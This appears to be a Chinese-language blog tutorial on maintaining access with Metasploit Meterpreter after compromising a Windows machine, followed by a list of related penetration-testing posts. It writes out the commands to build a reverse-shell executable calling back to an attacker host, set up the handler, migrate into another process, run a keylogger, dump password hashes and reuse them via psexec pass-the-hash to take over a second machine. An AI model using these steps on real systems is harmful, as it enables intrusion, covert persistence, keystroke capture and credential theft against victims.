MSF之meterpreter权限维持
00×01
首先,我们先来生成一个 meterpreter 类型的 PALOAD :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe
00×02
建立反弹处理 exploit :
use exploit/mutil/handler
set payload windows/meterpreter/reverse_tcp
set LHOST=192.168.2.133
set LPORT=1211
exploit
00×03
当目标系统成功运行我们配置好的 PAYLOAD ,我们就会在Kali的console界面,反弹取得 shell 。此时,我们要做的第一件事,就是将我们 PAYLOAD 的当前进程,转移注入到另外个可以维持我们持续权限的进程上!
migrate 616
00×04
接下来,我们就可以在取得shell的console界面进行对目标系统的任意操作了!例如:我们可以打开一个键盘记录器:
keyscan_start 开启键盘记录
keyscan_dump 查看记录内容
keyscan_stop 停止键盘记录
00×05
同样,我们还可以 hashdump 目标系统上的所有账户密码 hash :
hashdump
00×06
当我们取得 hash 值后,我们可以利用 MSF 提供的 smb exploit 模块进行 hash 直接登录!
use exploit/windows/smb/psexec
use windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set RHOST 192.168.2.131
set LPORT 1212
set SMBPass xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
set SMBUser administrator
00×07
最后,我们运行 exploit 即可!
MSF之meterpreter权限维持相关推荐
- 【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控
内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 [查看资料] 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路 ...
- MSF(六):后渗透
后渗透测试 安全牛学习Metasploit Framework笔记 一.已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二.基于已有session扩大战果 ...
- 内网渗透-window权限维持
window权限维持 文章目录 window权限维持 前言 meterpreter权限维持 persistence metsvc 系统工具替换后门 iexplore.exe narrator osk ...
- 内网渗透-msf及socks代理转发
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限. 0x01 路由转发1 先在meterpr ...
- 提权-win烂土豆dll劫持引号路径服务权限
以下几种提权方法的适合环境(web用户/本机用户)因方法而不同,有的方法在两种权限下都适用,一般也都是本机权限大于webshell权限. win 烂土豆提权(MS16-075): 烂土豆(Rotten ...
- 内网渗透之MSF框架模块详细作用介绍
目录 Metasploit Framework MSF主机存活探测类 MSF主机端口扫描类 MSF主机服务探测类 MSF主机反弹shell类 MSF主机服务爆破类 MSF攻击模块利用类 MSF数据库提 ...
- 三层网络靶场搭建MSF内网渗透
三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...
- Meterpreter 提权
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpret ...
- ms08_067漏洞渗透步骤——MSF
本文简单介绍了如何使用metasploit针对ms08_067进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192. ...
- Cobalt Strike 注入msf会话
目录 (一)环境准备 1.启动服务端 2.启动客户端 3.一个在msf拿到权限的靶机 (二) 配置msf创建监听 1.使用msf创建后门 2.使用python创建一个web服务,然后使用靶机下载 3. ...
最新文章
- 常见几种浏览器兼容性问题与解决方案
- iphone刷基带_iphone7基带坏了怎么办,iphone7基带修复多少钱
- JavaScript中判断是否存在某属性
- 06 矩阵计算【动手学深度学习v2】
- java 接口的观察者模式_java观察者模式
- docker mysql主从_使用docker 实现MySQL主从同步/读写分离
- 如何用计算机绘图画图,2018年《计算机绘图》考试试题及答案【完整版】.doc
- nonlocal和global关键字
- C++ 通讯录设计(七)
- 集线器级联增加了网络数量,效率降低了,形成了大的冲突域,怎么解决?
- 阿里第二代微服务强势崛起,你还敢往简历上写“精通”吗?
- ListView实现多种item布局的方法和注意事项
- JSLint说“缺少基数参数”
- 上海是怎么错失这些年的互联网机遇的?
- 创建图片外链——“极简图床”
- 个人开发作品分享:iTab新标签页
- C#使用System.Speech制作语音提示功能
- 【转】外连接&全连接的区别
- C语言gdb调试之精髓 | gdb调试多线程
- zabbix4.4.3使用postgresql数据库
热门文章
- 【知识图谱】实践篇——基于知识图谱的《红楼梦》人物关系可视化及问答系统实践:part5人物关系全貌与问答初入
- 举个栗子!Tableau 技巧(126):学几个常用的日期函数
- Variable Declarations
- 6.22 android计算字符高度宽度,红蓝3D图片的制作原理及NDK生成实现
- win10系统点击控制台自定义快捷键失效问题解决
- 奖金高达200万!武汉市便利店行业发展专项资金支持条件、材料及流程
- 翟菜花:从美团配送新品牌发布,看即时配送行业奇点何时到来
- win7 cmd 无法复制粘贴
- 日本艺伎的拍照姿势,竟源于孔子?看完真的涨知识···
- mysql视图出问题如何解决_MySQL视图